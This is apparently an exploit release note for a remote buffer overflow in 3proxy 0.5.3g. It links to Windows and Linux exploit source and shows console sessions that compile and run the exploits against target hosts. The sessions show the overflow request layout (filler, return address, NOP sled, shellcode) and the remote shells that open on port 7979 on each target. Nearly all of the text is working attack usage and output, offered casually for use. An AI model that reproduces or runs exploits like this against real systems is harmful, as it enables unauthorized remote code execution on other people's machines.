just for fun...
original exploit references:
http://fakehalo.us/x3proxy-win32.c
http://fakehalo.us/x3proxy.c
example(win32 service):
-------------------------------------------------------------------------
[v9@fhalo v9]$ gcc x3proxy-win32.c -o x3proxy-win32
[v9@fhalo v9]$ ./x3proxy-win32 -h desktop.fakehalo.lan
[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
[*] target: desktop.fakehalo.lan:3128
[*] return address($eip/"CALL ESP"): 0x7c81518b
[*] attempting to connect: desktop.fakehalo.lan:3128.
[*] successfully connected: desktop.fakehalo.lan:3128.
[*] sending string:
[+] GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n
[+] Host: [FILLERx999]\n\n
[*] closing connection.
[*] attempting to connect: desktop.fakehalo.lan:7979.
[*] successfully connected: desktop.fakehalo.lan:7979.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
example(linux):
-------------------------------------------------------------------------
[v9@fhalo v9]$ gcc x3proxy.c -o x3proxy
[v9@fhalo v9]$ ./x3proxy -h XXXXXXX.net -r 0x0805333c
[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
[*] target : XXXXXXX.net:3128
[*] shellcode type : bindshell(port=7979)
[*] return address($eip) : 0x0805333c(+0=0x0805333c)
[*] attempting to connect: XXXXXXX.net:3128.
[*] successfully connected: XXXXXXX.net:3128.
[*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n"
[*] closing connection.
[*] attempting to connect: XXXXXXX.net:7979.
[*] successfully connected: XXXXXXX.net:7979.
Linux XXXXXXX.net 2.6.18-gentoo-r2 #1 Sun Nov 12 11:31:19 PST 2006 i686
Intel(R) Pentium(R) 4 CPU 1300MHz GenuineIntel GNU/Linux
uid=515(v9) gid=572(v9) groups=572(v9)
